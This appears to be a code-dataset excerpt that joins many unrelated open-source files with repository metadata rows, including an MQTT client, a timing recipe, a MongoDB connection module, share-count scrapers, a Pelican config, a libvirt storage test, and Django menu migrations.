accel_zout_scaled = accel_zout / 16384.0
# print "accel_xout: ", accel_xout, " scaled: ", accel_xout_scaled
# print "accel_yout: ", accel_yout, " scaled: ", accel_yout_scaled
# print "accel_zout: ", accel_zout, " scaled: ", accel_zout_scaled
# print "x rotation: " , get_x_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled)
# print "y rotation: " , get_y_rotation(accel_xout_scaled, accel_yout_scaled, accel_zout_scaled)
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe("$SYS/#")
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("iot.eclipse.org", 1883, 60)
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
client.loop_forever()
|
mit
| 6,383,770,058,486,674,000
| 27.22549
| 97
| 0.674192
| false
| 2.67814
| false
| false
| false
|
ActiveState/code
|
recipes/Python/440657_Determine_functiexecutitime_Pythonic/recipe-440657.py
|
1
|
2051
|
"""
Determine function execution time.
>>> def f():
... return sum(range(10))
...
>>> pytime(f)
(Time to execute function f, including function call overhead).
>>> 1.0/pytime(f)
(Function calls/sec, including function call overhead).
>>> 1.0/pytime_statement('sum(range(10))')
(Statements/sec, does not include any function call overhead).
"""
import sys
# Source code is public domain.
if sys.platform == "win32":
from time import clock
else:
from time import time as clock
def pytime(f, args=(), kwargs={}, Tmax=2.0):
"""
Calls f many times to determine the average time to execute f.
Tmax is the maximum time to spend in pytime(), in seconds.
"""
count = 1
while True:
start = clock()
if args == () and kwargs == {}:
for i in xrange(count):
f()
elif kwargs == {}:
for i in xrange(count):
f(*args)
else:
for i in xrange(count):
f(*args, **kwargs)
T = clock() - start
if T >= Tmax/4.0: break
count *= 2
return T / count
def pytime_statement(stmt, global_dict=None, Tmax=2.0,
repeat_count=128):
"""
Determine time to execute statement (or block) of Python code.
Here global_dict is the globals dict used for exec, Tmax is the max
time to spend in pytime_statement(), in sec, and repeat_count is the
number of times to paste stmt into the inner timing loop (this is
automatically set to 1 if stmt takes too long).
"""
if global_dict is None:
global_dict = globals()
ns = {}
code = 'def timed_func():' + ('\n' +
'\n'.join([' '+x for x in stmt.split('\n')]))
exec code in global_dict, ns
start = clock()
ns['timed_func']()
T = clock() - start
if T >= Tmax/4.0:
return T
elif T >= Tmax/4.0/repeat_count:
return pytime(ns['timed_func'], (), {}, Tmax-T)
else:
code = 'def timed_func():' + ('\n' +
'\n'.join([' '+x for x in stmt.split('\n')]))*repeat_count
exec code in global_dict, ns
return pytime(ns['timed_func'], (), {}, Tmax-T) / repeat_count
|
mit
| -7,438,097,726,899,165,000
| 25.294872
| 70
| 0.601658
| false
| 3.401327
| false
| false
| false
|
jucacrispim/mongomotor
|
mongomotor/connection.py
|
1
|
3842
|
# -*- coding: utf-8 -*-
# Copyright 2016 Juca Crispim <juca@poraodojuca.net>
# This file is part of mongomotor.
# mongomotor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# mongomotor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with mongomotor. If not, see <http://www.gnu.org/licenses/>.
from mongoengine import connection
from mongoengine.connection import (connect as me_connect,
DEFAULT_CONNECTION_NAME,
disconnect as me_disconnect,
register_connection,
get_connection)
from mongomotor import utils
from mongomotor.clients import (MongoMotorAsyncIOClient,
MongoMotorTornadoClient)
from mongomotor.monkey import MonkeyPatcher
CLIENTS = {'asyncio': (MongoMotorAsyncIOClient,),
'tornado': (MongoMotorTornadoClient,)}
_db_version = {}
def get_mongodb_version(alias=DEFAULT_CONNECTION_NAME):
"""Return the version of the connected mongoDB (first 2 digits)
:param alias: The alias identifying the connection
:return: tuple(int, int)
"""
# e.g: (3, 2)
version_list = get_connection(alias).server_info()["versionArray"][:2]
return tuple(version_list)
def get_db_version(alias=DEFAULT_CONNECTION_NAME):
"""Returns the version of the database for a given alias. This
will patch the original mongoengine's get_mongodb_version.
:param alias: The alias identifying the connection.
"""
return _db_version[alias]
def connect(db=None, async_framework='asyncio',
alias=DEFAULT_CONNECTION_NAME, **kwargs):
"""Connect to the database specified by the 'db' argument.
Connection settings may be provided here as well if the database is not
running on the default port on localhost. If authentication is needed,
provide username and password arguments as well.
Multiple databases are supported by using aliases. Provide a separate
`alias` to connect to a different instance of :program:`mongod`.
Parameters are the same as for :func:`mongoengine.connection.connect`
plus one:
:param async_framework: Which asynchronous framework should be used.
It can be `tornado` or `asyncio`. Defaults to `asyncio`.
"""
clients = CLIENTS[async_framework]
with MonkeyPatcher() as patcher:
patcher.patch_db_clients(*clients)
patcher.patch_sync_connections()
ret = me_connect(db=db, alias=alias, **kwargs)
# here we register a connection that will use the original pymongo
# client and if used will block the process.
# We need to patch here otherwise we will get the async connection
# beeing reused instead of a sync one.
with MonkeyPatcher() as patcher:
patcher.patch_item(connection, '_find_existing_connection',
lambda *a, **kw: None)
kwargs.pop('io_loop', None)
sync_alias = utils.get_sync_alias(alias)
register_connection(sync_alias, db, **kwargs)
_db_version[alias] = get_mongodb_version(sync_alias)
return ret
def disconnect(alias=DEFAULT_CONNECTION_NAME):
"""Disconnects from the database indentified by ``alias``.
"""
me_disconnect(alias=alias)
# disconneting sync connection
sync_alias = utils.get_sync_alias(alias)
me_disconnect(alias=sync_alias)
|
gpl-3.0
| 4,309,757,562,831,834,600
| 34.906542
| 75
| 0.682457
| false
| 4.176087
| false
| false
| false
|
thinkxl/mentions
|
mentions/mentions.py
|
1
|
3175
|
# -*- coding: utf-8 -*-
"""
This module contains the primary objects that power Mention.
"""
import json
import requests
from bs4 import BeautifulSoup
headers = {'User-Agent': 'Karma v0.1.0', 'From': '@thinkxl'}
# Facebook
def get_facebook_data(method, url):
try:
facebook_url = 'https://api.facebook.com/method/fql.query?query=select \
' + method + ' from link_stat where url="' + url + '"&format=json'
r = requests.get(facebook_url, headers=headers)
json_data = json.loads(r.text)
return json_data[0][method]
except:
return 0
def facebook_total_count(url):
return get_facebook_data('total_count', url)
def facebook_like_count(url):
return get_facebook_data('like_count', url)
def facebook_comment_count(url):
return get_facebook_data('comment_count', url)
def facebook_share_count(url):
return get_facebook_data('share_count', url)
# Twitter
def tweets(url):
"""tweets count"""
try:
twitter_url = 'http://urls.api.twitter.com/1/urls/count.json?url=' + url
r = requests.get(twitter_url, headers=headers)
json_data = json.loads(r.text)
return json_data['count']
except:
return 0
# Google+
def google_plus_one(url):
"""+1's count"""
try:
google_url = 'https://plusone.google.com/_/+1/fastbutton?url=' + url
soup = BeautifulSoup(requests.get(google_url, headers=headers).text)
tag = soup.find_all(id="aggregateCount")[0]
count = tag.string.extract()
return count
except:
return 0
def linkedin_mentions(url):
"""mentions count"""
try:
linkedin_url = 'http://www.linkedin.com/countserv/count/share?url=' \
+ url + '&format=json'
json_data = json.loads(requests.get(linkedin_url, headers=headers).text)
return json_data['count']
except:
return 0
def pinterest_shares(url):
"""pinterest share count"""
try:
pinterest_url = 'http://api.pinterest.com/v1/urls/count.json?url=' \
+ url
response = requests.get(pinterest_url).text\
.replace('receiveCount(', '')\
.replace(')', '')
json_data = json.loads(response)
return json_data['count']
except:
return 0
def stumbleupon_views(url):
"""views count"""
try:
stumbleupon_url = 'http://www.stumbleupon.com/services/1.01/badge.getinfo?\
url=' + url + '&format=jsonp'
json_data = json.loads(requests.get(stumbleupon_url).text)
return json_data['result']['views']
except:
return 0
# def delicious_count(url):
# """bookmarked count"""
# delicious_url = 'http://feeds.delicious.com/v2/json/urlinfo/data?url='\
# + url
# return requests.get(delicious_url).response
def reddit_mentions(url):
"""mentions count"""
try:
reddit_url = 'http://www.reddit.com/api/info.json?url=' + url
json_data = json.loads(requests.get(reddit_url, headers=headers).text)
return len(json_data['data']['children'])
except:
return 0
|
mit
| 7,374,464,425,110,252,000
| 29.238095
| 83
| 0.596535
| false
| 3.410311
| false
| false
| false
|
kpolimis/kpolimis.github.io-src
|
pelicanconf.py
|
1
|
3979
|
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
import os
#from utils import filters
AUTHOR = u'Kivan Polimis'
SITENAME = u'Kivan Polimis'
# SITESUBTITLE = u'my personal musings and attempts to apply \
# and share some programming tips'
INDEX_SAVE_AS = 'pages/home.html'
PATH = 'content'
PAGE_ORDER_BY = 'sortorder'
# Times and dates
TIMEZONE = 'US/Pacific'
DEFAULT_LANG = u'en'
SUMMARY_MAX_LENGTH = '50'
GOOGLE_ANALYTICS = 'UA-104881568-1'
# Set the article URL
#ARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'
#ARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
# Theme and plugins
# JINJA_FILTERS = {'sidebar': filters.sidebar}
THEME = "pelican-themes/nest"
# Minified CSS
NEST_CSS_MINIFY = True
# Add canonical link element to top page header and all article/author/category/tag page header
NEST_REL_CANONICAL_LINK = True
NEST_HEADER_IMAGES = ''
NEST_HEADER_LOGO = '/images/jade_mountain.png'
DISPLAY_PAGES_ON_MENU = False
# MENUITEMS = [('Home', '/index.html'), ('Articles', '/categories.html')]
MENUITEMS = [('Home', '/index.html'),('Articles','/categories.html'),
('Vita','/pages/vita.html'), ('Software','/pages/software.html'),
('Projects','/pages/projects.html')]
# categories.html
NEST_CATEGORIES_HEAD_TITLE = u'Articles'
NEST_CATEGORIES_HEAD_DESCRIPTION = u'Articles listed by category'
NEST_CATEGORIES_HEADER_TITLE = u'Articles'
NEST_CATEGORIES_HEADER_SUBTITLE = u'Articles listed by category'
# software.html
NEST_SOFTWARE_HEAD_TITLE = u'Software'
NEST_SOFTWARE_HEAD_DESCRIPTION = u'Software'
NEST_SOFTWARE_HEADER_TITLE = u'Software'
NEST_SOFTWARE_HEADER_SUBTITLE = u'Articles listed by category'
# Footer
NEST_SITEMAP_COLUMN_TITLE = u'Sitemap'
NEST_SITEMAP_MENU = [('Home', '/index.html'),('Articles','/categories.html'),
('Vita','/pages/vita.html'), ('Software','/pages/software.html'),
('Projects','/pages/projects.html')]
NEST_SITEMAP_ATOM_LINK = u'Atom Feed'
NEST_SITEMAP_RSS_LINK = u'RSS Feed'
NEST_SOCIAL_COLUMN_TITLE = u'Social'
NEST_LINKS_COLUMN_TITLE = u'Links'
NEST_COPYRIGHT = u'© Kivan Polimis 2021'
# pagination.html
NEST_PAGINATION_PREVIOUS = u'Previous'
NEST_PAGINATION_NEXT = u'Next'
# Footer optional
NEST_FOOTER_HTML = ''
# Static files
STATIC_PATHS = ['images', 'favicon.ico']
CODE_DIR = 'downloads/code'
NOTEBOOK_DIR = 'downloads/notebooks'
READERS = {'html': None}
PLUGIN_PATHS = ['pelican-plugins']
PLUGINS = ['liquid_tags.notebook', # for embedding notebooks
'summary', # auto-summarizing articles
'feed_summary', # use summaries for RSS, not full articles
'render_math'
]
MD = ['codehilite(css_class=highlight)','extra', 'mathjax']
# Only use LaTeX for selected articles
LATEX = 'article'
# SUMMARY_USE_FIRST_PARAGRAPH = 'True'
TWITTER_USERNAME = 'kpolimis'
GITHUB_USERNAME = 'kpolimis'
AUTHOR_CV = "http://kivanpolimis.com/docs/Kivan_Polimis_Curriculum_Vitae.pdf"
SHOW_ARCHIVES = True
IGNORE_FILES = ['.ipynb_checkpoints']
if not os.path.exists('_nb_header.html'):
import warnings
warnings.warn("_nb_header.html not found. "
"Rerun make html to finalize build.")
else:
EXTRA_HEADER = open('_nb_header.html').read()
# RMD_READER_KNITR_OPTS_CHUNK = {'fig.path': '../../../figure/'}
# Feed generation is usually not desired when developing
FEED_ALL_ATOM = None
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
AUTHOR_FEED_ATOM = None
AUTHOR_FEED_RSS = None
# Title menu options
DEFAULT_PAGINATION = 10
# Uncomment following line if you want document-relative URLs when developing
RELATIVE_URLS = True
# Blogroll
#LINKS = (('Pelican', 'http://getpelican.com/'),
# ('Python.org', 'http://python.org/'),
# ('Jinja2', 'http://jinja.pocoo.org/'),
# ('You can modify those links in your config file', '#'),)
# Social widget
#SOCIAL = (('You can add links in your config file', '#'),
# ('Another social link', '#'),)
|
gpl-3.0
| 2,233,683,985,221,732,400
| 28.474074
| 95
| 0.688615
| false
| 2.923586
| false
| false
| false
|
libvirt/libvirt-test-API
|
libvirttestapi/repos/storage/dir_vol_upload.py
|
1
|
5210
|
# Copyright (C) 2010-2012 Red Hat, Inc.
# This work is licensed under the GNU GPLv2 or later.
# dir storage volume upload testing, only raw format volume is
# supported, other format might fail. offset and length can
# only be chosen in 0 and 1048576.
import os
import string
import sys
from xml.dom import minidom
from libvirt import libvirtError
from libvirttestapi.src import sharedmod
from libvirttestapi.utils import utils
required_params = ('poolname', 'volname', 'volformat', 'capacity',
'offset', 'length',)
optional_params = {'xml': 'xmls/dir_volume.xml',
}
def get_pool_path(poolobj):
""" get pool xml description
"""
poolxml = poolobj.XMLDesc(0)
logger.debug("the xml description of pool is %s" % poolxml)
doc = minidom.parseString(poolxml)
path_element = doc.getElementsByTagName('path')[0]
textnode = path_element.childNodes[0]
path_value = textnode.data
return path_value
def write_file(path):
"""write 1M test data to file
"""
logger.info("write data into file %s" % path)
f = open(path, 'w')
if sys.version_info[0] < 3:
datastr = ''.join(string.lowercase + string.uppercase +
string.digits + '.' + '\n')
else:
datastr = ''.join(string.ascii_lowercase + string.ascii_uppercase +
string.digits + '.' + '\n')
data = ''.join(16384 * datastr)
f.write(data)
f.close()
def handler(stream, data, file_):
return file_.read(data)
def dir_vol_upload(params):
"""test volume download and check"""
global logger
logger = params['logger']
poolname = params['poolname']
volname = params['volname']
volformat = params['volformat']
offset = int(params['offset'])
length = int(params['length'])
capacity = params['capacity']
xmlstr = params['xml']
logger.info("the poolname is %s, volname is %s, volformat is %s" %
(poolname, volname, volformat))
logger.info("upload offset is: %s" % offset)
logger.info("the data length to upload is: %s" % length)
conn = sharedmod.libvirtobj['conn']
try:
poolobj = conn.storagePoolLookupByName(poolname)
path_value = get_pool_path(poolobj)
volume_path = path_value + "/" + volname
xmlstr = xmlstr.replace('VOLPATH', volume_path)
xmlstr = xmlstr.replace('SUFFIX', capacity[-1])
xmlstr = xmlstr.replace('CAP', capacity[:-1])
logger.debug("volume xml:\n%s" % xmlstr)
logger.info("create %s %s volume" % (volname, volformat))
vol = poolobj.createXML(xmlstr, 0)
test_path = path_value + "/" + "vol_test"
write_file(test_path)
olddigest = utils.digest(test_path, 0, 0)
logger.debug("the old file digest is: %s" % olddigest)
if offset:
origdigestpre = utils.digest(volume_path, 0, offset)
else:
origdigestpre = ''
logger.debug("the original pre region digest is: %s" % origdigestpre)
origdigestpost = utils.digest(volume_path, offset + 1024 * 1024, 0)
logger.debug("the original post region digest is: %s" % origdigestpost)
st = conn.newStream(0)
if sys.version_info[0] < 3:
f = open(test_path, 'r')
else:
f = open(test_path, 'rb')
logger.info("start upload")
vol.upload(st, offset, length, 0)
logger.info("sent all data")
st.sendAll(handler, f)
logger.info("finished stream")
st.finish()
f.close()
newdigest = utils.digest(volume_path, offset, 1024 * 1024)
logger.debug("the new file digest is: %s" % olddigest)
if offset:
newdigestpre = utils.digest(volume_path, 0, offset)
else:
newdigestpre = ''
logger.debug("the new pre region digest is: %s" % origdigestpre)
newdigestpost = utils.digest(volume_path, offset + 1024 * 1024, 0)
logger.debug("the new post region digest is: %s" % origdigestpost)
if newdigestpre == origdigestpre:
logger.info("file pre region digests match")
else:
logger.error("file pre region digests not match")
return 1
if olddigest == newdigest:
logger.info("file digests match")
else:
logger.error("file digests not match")
return 1
if newdigestpost == origdigestpost:
logger.info("file post region digests match")
else:
logger.error("file post region digests not match")
return 1
except libvirtError as e:
logger.error("libvirt call failed: " + str(e))
return 1
return 0
def dir_vol_upload_clean(params):
"""clean testing environment"""
poolname = params['poolname']
volname = params['volname']
conn = sharedmod.libvirtobj['conn']
poolobj = conn.storagePoolLookupByName(poolname)
path_value = get_pool_path(poolobj)
test_path = path_value + "/" + "vol_test"
vol = poolobj.storageVolLookupByName(volname)
vol.delete(0)
if os.path.exists(test_path):
os.unlink(test_path)
return 0
|
gpl-2.0
| 4,381,108,374,907,106,000
| 29.647059
| 79
| 0.605758
| false
| 3.681979
| true
| false
| false
|
olingrobin/test
|
day1/user.py
|
1
|
1087
|
error_name = open("namefile.txt","a")
error_name.close()
list = {"jin":"123","tom":"456","jak":"789","aimi":"012"}
count = 0
status = False
while True:
user_name = input("请输入用户名:")
error_name = open("namefile.txt","r")
for name in error_name:
if user_name == name.strip():
status = True
break
if status == True:
error_name.close()
print("用户已被禁止登陆")
break
user_password = input("请输入密码:")
for k,v in list.items():
if user_name in k and user_password in v:
print("欢迎用户:",k)
status = True
break
else:
continue
if status == True:
break
count += 1
if count < 3:
print("请检查用户名或密码:")
continue
if count >= 3:
print("输入错误三次,用户",user_name,"已进入黑名单")
error_user = open("namefile.txt","a")
error_user.write(user_name)
error_user.write("\n")
error_user.close()
break
|
gpl-3.0
| -9,159,499,533,204,680,000
| 22.642857
| 57
| 0.512588
| false
| 3.152381
| false
| false
| false
|
DeveloperJose/Vision-Rat-Brain
|
feature_matching_v3/util_sift.py
|
1
|
1540
|
# Author: Jose G Perez
# Version 1.0
# Last Modified: January 31, 2018
import numpy as np
import cv2
import os
SIFT = cv2.xfeatures2d.SIFT_create(contrastThreshold=0.05, edgeThreshold=100, sigma=2)
def kp_to_array(kp):
array = np.zeros((len(kp), 7), dtype=np.float32)
for idx in range(array.shape[0]):
k = kp[idx]
array[idx] = np.array([k.pt[0], k.pt[1], k.size,k.angle,k.response,k.octave,k.class_id])
return array
def array_to_kp(array):
kp = []
for idx in range(array.shape[0]):
k = array[idx]
kp.append(cv2.KeyPoint(k[0],k[1],k[2],k[3],k[4],k[5],k[6]))
return kp
def __precompute_atlas(name):
if not os.path.isfile(name + '_SIFT.npz'):
print('Precomputing SIFT for ', name)
atlas_data = np.load(name + ".npz")
atlas_im = atlas_data['images']
atlas_labels = atlas_data['labels']
atlas_kp = []
atlas_des = []
for i in range(0, atlas_im.shape[0]):
kp, des = SIFT.detectAndCompute(atlas_im[i], None)
kp = kp_to_array(kp)
atlas_kp.append(kp)
atlas_des.append(des)
atlas_kp = np.asarray(atlas_kp)
atlas_des = np.asarray(atlas_des)
np.savez_compressed(name + '_SIFT', images=atlas_im, labels=atlas_labels, kp=atlas_kp, des=atlas_des)
def precompute_sift(S_NAME, PW_NAME):
__precompute_atlas(S_NAME)
__precompute_atlas(PW_NAME)
def load_sift(path):
data = np.load(path)
return data['images'], data['labels'], data['kp'], data['des']
|
mit
| -6,412,502,763,211,562,000
| 30.44898
| 109
| 0.597403
| false
| 2.745098
| false
| false
| false
|
wd8rde/genesis_g59_py
|
setup.py
|
1
|
1416
|
#!/usr/bin/env python
#The MIT License (MIT)
#
#Copyright (c) 2015 Robert Anthony Bouterse, WD8RDE
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from distutils.core import setup
setup(name='genesis_g59',
version='0.1',
description='Genesis G59 USB Control Utilities',
author='WD8RDE',
author_email='wd8rde@gmail.com',
url='',
packages=['genesis_g59','genesis_g59.g59_si570'],
)
|
mit
| -5,464,127,228,988,461,000
| 43.25
| 79
| 0.75565
| false
| 3.933333
| false
| false
| false
|
Dangetsu/vnr
|
Frameworks/Sakura/py/libs/vnragent/engine.py
|
1
|
2147
|
# coding: utf8
# engine.py
# 5/3/2014 jichi
# The logic in this file must be consistent with that in vnragent.dll.
if __name__ == '__main__': # DEBUG
import sys
sys.path.append("..")
import os
from glob import glob
from sakurakit.skdebug import dprint
from sakurakit.skfileio import escapeglob
class Engine:
def __init__(self, name='', regionLocked=False, vnrboot=False, **kwargs):
self.name = name # str
self.regionLocked = regionLocked # bool
self.vnrboot = vnrboot # bool
# Not used
#def encoding(self): return 'utf-16' if self.wideChar else 'shift-jis'
class EngineFinder:
def __init__(self, pid=0, exepath='', dirpath=''):
"""
@param* pid long process id
@param* exepath unicode executable path
@param* dirpath unicode process directory path
"""
if not exepath and pid:
exepath = skwin.get_process_path(pid)
if not dirpath and exepath:
dirpath = os.path.dirname(exepath)
self.pid = pid # long
self.exepath = exepath # unicode
self.dirpath = dirpath # unicode
#self.processName = skwin.get_process_name(pid)
def eval(self, e):
"""
@param e list or str
@return bool
"""
if not e:
return False
if isinstance(e, list):
for it in e:
if not self.eval(it):
return False
return True
# e is str or unicode
elif '|' in e:
for it in e.split('|'):
if self.eval(it):
return True
return False
elif e[0] == '!' and len(e) > 1:
return not self.eval(e[1:])
elif '*' in e:
return self.globs(e)
else:
return self.exists(e)
def globs(self, relpath):
"""
@param relpath unicode
@return bool
"""
return bool(self.dirpath and glob(os.path.join(escapeglob(self.dirpath), relpath)))
def exists(self, relpath):
"""
@param relpath unicode
@return bool
"""
return bool(self.dirpath) and os.path.exists(os.path.join(self.dirpath, relpath))
def getAbsPath(self, relpath):
"""
@param relpath unicode
@return unicode
"""
return os.path.join(self.dirpath, relpath)
# EOF
|
gpl-3.0
| -3,036,005,952,833,670,000
| 23.965116
| 87
| 0.615277
| false
| 3.413355
| false
| false
| false
|
gmimano/commcaretest
|
corehq/apps/reports/filters/select.py
|
1
|
5848
|
import datetime
import calendar
from django.conf import settings
from django.utils.translation import ugettext_noop
from django.utils.translation import ugettext as _
from casexml.apps.case.models import CommCareCase, CommCareCaseGroup
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import Domain, LICENSES
from corehq.apps.groups.models import Group
from corehq.apps.orgs.models import Organization
from corehq.apps.reports.filters.base import BaseSingleOptionFilter, BaseMultipleOptionFilter
class SelectRegionFilter(BaseSingleOptionFilter):
slug = "region"
label = ugettext_noop("Region")
default_text = ugettext_noop("All Regions")
@property
def options(self):
if hasattr(Domain, 'regions'):
available_regions = [(d.replace(' ', '+'), d) for d in Domain.regions()]
else:
available_regions = []
return available_regions
class SelectLicenseFilter(BaseSingleOptionFilter):
slug = "license"
label = ugettext_noop("License")
default_text = ugettext_noop("All Licenses")
@property
def options(self):
return [(code, license_name) for code, license_name in LICENSES.items()]
class SelectCategoryFilter(BaseSingleOptionFilter):
slug = "category"
label = ugettext_noop("Category")
default_text = ugettext_noop("All Categories")
@property
def options(self):
if hasattr(Domain, 'categories'):
available_categories = [(d.replace(' ', '+'), d) for d in Domain.categories()]
else:
available_categories = []
return available_categories
class SelectOrganizationFilter(BaseSingleOptionFilter):
slug = "org"
label = ugettext_noop("Organization")
default_text = ugettext_noop("All Organizations")
@property
def options(self):
return [(o.name, o.title) for o in Organization.get_all()]
class GroupFilterMixin(object):
slug = "group"
label = ugettext_noop("Group")
default_text = ugettext_noop("Everybody")
@property
def options(self):
return [(group.get_id, group.name) for group in Group.get_reporting_groups(self.domain)]
class GroupFilter(GroupFilterMixin, BaseSingleOptionFilter):
placeholder = ugettext_noop('Click to select a group')
class MultiGroupFilter(GroupFilterMixin, BaseMultipleOptionFilter):
placeholder = ugettext_noop('Click to select groups')
class YearFilter(BaseSingleOptionFilter):
slug = "year"
label = ugettext_noop("Year")
default_text = None
@property
def options(self):
start_year = getattr(settings, 'START_YEAR', 2008)
years = [(unicode(y), y) for y in range(start_year, datetime.datetime.utcnow().year + 1)]
years.reverse()
return years
class MonthFilter(BaseSingleOptionFilter):
slug = "month"
label = ugettext_noop("Month")
default_text = None
@property
def options(self):
return [("%02d" % m, calendar.month_name[m]) for m in range(1, 13)]
class CaseTypeFilter(BaseSingleOptionFilter):
slug = "case_type"
label = ugettext_noop("Case Type")
default_text = ugettext_noop("All Case Types")
@property
def options(self):
case_types = self.get_case_types(self.domain)
return [(case, "%s" % case) for case in case_types]
@classmethod
def get_case_types(cls, domain):
key = [domain]
for r in CommCareCase.get_db().view(
'hqcase/all_cases',
startkey=key,
endkey=key + [{}],
group_level=2
).all():
_, case_type = r['key']
if case_type:
yield case_type
@classmethod
def get_case_counts(cls, domain, case_type=None, user_ids=None):
"""
Returns open count, all count
"""
user_ids = user_ids or [{}]
for view_name in ('hqcase/open_cases', 'hqcase/all_cases'):
def individual_counts():
for user_id in user_ids:
key = [domain, case_type or {}, user_id]
try:
yield CommCareCase.get_db().view(
view_name,
startkey=key,
endkey=key + [{}],
group_level=0
).one()['value']
except TypeError:
yield 0
yield sum(individual_counts())
class SelectOpenCloseFilter(BaseSingleOptionFilter):
slug = "is_open"
label = ugettext_noop("Opened / Closed")
default_text = ugettext_noop("Show All")
@property
def options(self):
return [
('open', _("Only Open")),
('closed', _("Only Closed")),
]
class SelectApplicationFilter(BaseSingleOptionFilter):
slug = "app"
label = ugettext_noop("Application")
default_text = ugettext_noop("Select Application [Latest Build Version]")
@property
def options(self):
apps_for_domain = Application.get_db().view(
"app_manager/applications_brief",
startkey=[self.domain],
endkey=[self.domain, {}],
include_docs=True
).all()
return [(app['value']['_id'], _("%(name)s [up to build %(version)s]") % {
'name': app['value']['name'],
'version': app['value']['version']}) for app in apps_for_domain]
class MultiCaseGroupFilter(BaseMultipleOptionFilter):
slug = "case_group"
label = ugettext_noop("Case Group")
default_text = ugettext_noop("All Case Groups")
placeholder = ugettext_noop('Click to select case groups')
@property
def options(self):
return [(g["id"], g["key"][1]) for g in CommCareCaseGroup.get_all(self.domain, include_docs=False)]
|
bsd-3-clause
| 2,471,994,198,075,688,000
| 31.131868
| 107
| 0.612859
| false
| 4.075261
| false
| false
| false
|
django-erp/django-erp
|
djangoerp/menus/migrations/0002_initial_fixture.py
|
1
|
3421
|
from django.db import models, migrations
from django.utils.translation import ugettext_noop as _
from django.urls import reverse
from ..utils import create_detail_actions, create_detail_navigation
def install(apps, schema_editor):
# Models.
User = apps.get_model('core.User')
Group = apps.get_model('core.Group')
Permission = apps.get_model('core.Permission')
Menu = apps.get_model('menus.Menu')
Link = apps.get_model('menus.Link')
# Instances.
users_group, is_new = Group.objects.get_or_create(name="users")
add_bookmark, is_new = Permission.objects.get_or_create_by_natural_key("add_link", "menus", "Link")
edit_user, is_new = Permission.objects.get_or_create_by_natural_key("change_user", "core", "User")
delete_user, is_new = Permission.objects.get_or_create_by_natural_key("delete_user", "core", "User")
# Menus.
main_menu, is_new = Menu.objects.get_or_create(
slug="main",
description=_("Main menu")
)
user_area_not_logged_menu, is_new = Menu.objects.get_or_create(
slug="user_area_not_logged",
description=_("User area for anonymous users")
)
user_area_logged_menu, is_new = Menu.objects.get_or_create(
slug="user_area_logged",
description=_("User area for logged users")
)
user_detail_actions, is_new = create_detail_actions(User)
user_detail_navigation, is_new = create_detail_navigation(User)
# Links.
my_dashboard_link, is_new = Link.objects.get_or_create(
menu_id=main_menu.pk,
title=_("My Dashboard"),
slug="my-dashboard",
description=_("Go back to your dashboard"),
url="/"
)
login_link, is_new = Link.objects.get_or_create(
title=_("Login"),
slug="login",
description=_("Login"),
url=reverse("user_login"),
only_authenticated=False,
menu_id=user_area_not_logged_menu.pk
)
administration_link, is_new = Link.objects.get_or_create(
title=_("Administration"),
slug="administration",
description=_("Administration panel"),
url="/admin/",
only_staff=True,
menu_id=user_area_logged_menu.pk
)
logout_link, is_new = Link.objects.get_or_create(
title=_("Logout"),
slug="logout",
description=_("Logout"),
url=reverse("user_logout"),
menu_id=user_area_logged_menu.pk
)
user_edit_link, is_new = Link.objects.get_or_create(
title=_("Edit"),
slug="user-edit",
description=_("Edit"),
url="user_edit",
context='{"pk": "object.pk"}',
menu_id=user_detail_actions.pk
)
user_edit_link.only_with_perms.set([edit_user])
user_delete_link, is_new = Link.objects.get_or_create(
title=_("Delete"),
slug="user-delete",
description=_("Delete"),
url="user_delete",
context='{"pk": "object.pk"}',
menu_id=user_detail_actions.pk
)
user_delete_link.only_with_perms.set([delete_user])
# Permissions.
users_group.permissions.add(add_bookmark)
class Migration(migrations.Migration):
dependencies = [
('menus', '0001_initial'),
('contenttypes', '0002_remove_content_type_name'),
('core', '0002_initial_fixture'),
]
operations = [
migrations.RunPython(install),
]
|
mit
| -8,335,009,606,325,166,000
| 30.1
| 104
| 0.602455
| false
| 3.604847
| false
| false
| false
|
DazWorrall/ansible
|
contrib/inventory/azure_rm.py
|
1
|
32749
|
#!/usr/bin/env python
#
# Copyright (c) 2016 Matt Davis, <mdavis@ansible.com>
# Chris Houseknecht, <house@redhat.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
